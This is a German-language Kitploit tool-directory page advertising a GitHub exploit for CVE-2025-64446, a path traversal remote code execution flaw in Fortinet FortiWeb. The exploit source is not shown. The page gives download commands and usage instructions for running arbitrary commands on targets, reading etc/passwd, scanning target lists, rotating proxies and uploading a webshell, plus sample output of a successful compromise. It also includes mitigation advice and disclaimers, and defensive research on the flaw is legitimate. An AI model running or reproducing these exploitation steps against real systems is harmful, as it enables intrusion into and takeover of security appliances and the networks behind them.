Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-64446-fortiweb-exploit — Sicherheitsforschungstool zur Erkennung und Prüfung von CVE-2025-64446 (FortiWeb Path Traversal RCE-Schwachstelle) | Kitploit
Tools/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Sicherheitsforschungstool zur Erkennung und Prüfung von CVE-2025-64446 (FortiWeb Path Traversal RCE-Schwachstelle)

Repository anzeigen
111vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-64446 Fortinet FortiWeb Path Traversal RCE-Exploit

Ein Sicherheitsforschungstool zur Erkennung und Prüfung der Sicherheitslücke CVE-2025-64446 in der Web Application Firewall (WAF) Fortinet FortiWeb. Diese kritische Zero-Day-Path-Traversal-Schwachstelle wird derzeit aktiv in freier Wildbahn ausgenutzt und ermöglicht es nicht authentifizierten Angreifern, Sicherheitskontrollen zu umgehen und beliebigen Code auszuführen.

⚠️ Disclaimer

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Der unbefugte Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

📋 Überblick

CVE-2025-64446 ist eine kritische Zero-Day-Path-Traversal-Schwachstelle in der Fortinet FortiWeb WAF, die derzeit aktiv in freier Wildbahn ausgenutzt wird. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, durch Path-Traversal-Angriffe Sicherheitskontrollen zu umgehen, was potenziell zu Remote-Code-Ausführung, Zugriff auf Konfigurationsdateien und vollständiger Systemkompromittierung führen kann.

CVSS-Score: 9.8 (Kritisch)
Status: Aktiv in freier Wildbahn ausgenutzt
CISA KEV: Zum Katalog der bekannten ausgenutzten Schwachstellen hinzugefügt
Patch: FG-IR-25-910
Betroffenes Produkt: Fortinet FortiWeb WAF

🔍 Funktionen

  • Automatisierte FortiWeb-Erkennung: Identifiziert FortiWeb-WAF-Bereitstellungen
  • Path-Traversal-Tests: Testet mehrere Path-Traversal-Payload-Varianten
  • Bestätigung der Schwachstelle: Verifiziert die CVE-2025-64446-Schwachstelle
  • Zugriff auf Konfigurationsdateien: Versucht, FortiWeb-Konfigurationsdateien zu lesen
  • Webshell-Bereitstellung: Demonstriert die Fähigkeit zum Hochladen einer Webshell
  • Befehlsausführung: Führt beliebige Befehle aus (für autorisierte Tests)
  • Multithreading-Unterstützung: Mehrere Ziele parallel scannen
  • Proxy-Unterstützung: Umgehung zusätzlicher Sicherheitsbeschränkungen
  • JSON-Export: Detaillierte Ergebnisse im JSON-Format
  • POC-Skript enthalten: Einfacher Proof-of-Concept-Nachweis

📦 Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip (Python-Paketmanager)

Schnellinstallation

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Install dependencies
pip install -r requirements.txt

# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternative: Direkter Download

root@kitploit:~
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Install dependencies
pip install requests

🚀 Nutzung

Grundlegende Nutzung

root@kitploit:~
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Verwendung von Proxys

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

POC-Skript

root@kitploit:~
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com

# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v

Befehlszeilenoptionen

root@kitploit:~
-u, --url          Ziel-URL
-f, --file         Datei mit Ziel-URLs (eine pro Zeile)
-c, --command      Auszuführender Befehl (Standard: id)
-t, --threads      Anzahl der Threads (Standard: 1)
-o, --output       Ausgabedatei (Standard: uknf_fortiweb_results.json)
-v, --verbose      Ausführliche Protokollierung aktivieren
--proxy            Proxy-URL (z. B. http://127.0.0.1:8080)
--proxy-list       Datei mit Proxy-URLs (eine pro Zeile)

📊 Ausgabe

Das Skript generiert eine JSON-Datei mit detaillierten Ergebnissen:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Funktionsweise

  1. Erkennungsphase: Scannt nach FortiWeb-WAF-Indikatoren (Header, Inhalt, Fehlerseiten)
  2. Schwachstellentest: Testet mehrere Path-Traversal-Payload-Varianten
  3. Bestätigung des Path Traversal: Überprüft erfolgreichen Dateizugriff
  4. Konfigurationszugriff: Versucht, FortiWeb-Konfigurationsdateien zu lesen
  5. Ausnutzung: Falls angreifbar, demonstriert die RCE-Fähigkeit durch Webshell-Bereitstellung

🛡️ Gegenmaßnahmen

Falls Sie FortiWeb WAF verwenden:

  1. Sicherheitsupdates sofort einspielen:

    root@kitploit:~
    # Check current version
    show system status
    
    # Update to latest version
    execute upgrade <firmware-file>
    
    • Referenz: FG-IR-25-910
  2. Netzwerksegmentierung:

    • Zugriff auf die FortiWeb-Verwaltungsoberfläche einschränken
    • Netzwerk-ACLs implementieren
    • VPN für administrativen Zugriff verwenden
  3. Konfigurationshärtung:

    • Nicht benötigte Funktionen deaktivieren
    • Strenge Zugriffskontrollen implementieren
    • Umfassende Protokollierung und Überwachung aktivieren
  4. CISA-Anforderungen:

    • Bundesbehörden müssen innerhalb von 7 Tagen patchen
    • CISA-KEV-Katalog auf Aktualisierungen überwachen

📚 Referenzen

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • CISA KEV Catalog: CVE-2025-64446
  • Tenable Blog: CVE-2025-64446 Analysis

📖 Beispiele

Beispiel 1: Einzelziel-Scan

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Beispiel 2: Mehrere Ziele mit Ausgabe

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Beispiel 3: Benutzerdefinierte Befehlsausführung

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Beispiel 4: Verwendung von Proxys

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Beispiel 5: POC-Tests

root@kitploit:~
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com

# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Mitwirken

Beiträge sind willkommen! Zögern Sie nicht, einen Pull Request einzureichen.

  1. Repository forken
  2. Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
  3. Committen Sie Ihre Änderungen (git commit -m 'Add some AmazingFeature')
  4. Pushen Sie den Branch (git push origin feature/AmazingFeature)
  5. Öffnen Sie einen Pull Request

🐛 Probleme

Wenn Sie auf Probleme stoßen oder Vorschläge haben, eröffnen Sie bitte ein Issue auf GitHub.

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

⭐ Sternenverlauf

Wenn Sie dieses Tool nützlich finden, ziehen Sie bitte in Betracht, ihm einen Stern auf GitHub zu geben!

⚖️ Rechtliches

Dieses Tool wird ausschließlich für Bildungs- und autorisierte Sicherheitstests bereitgestellt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen die entsprechende Genehmigung haben.

🙏 Danksagungen

  • Original-Melder der Schwachstelle und Sicherheitsforscher
  • Fortinet PSIRT für die Offenlegung der Schwachstelle
  • CISA für die Pflege des KEV-Katalogs
  • Sicherheitsgemeinschaft für die laufende Forschung

💰 Spenden

Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Vielen Dank für Ihre Unterstützung! 🙏

Tool herunterladen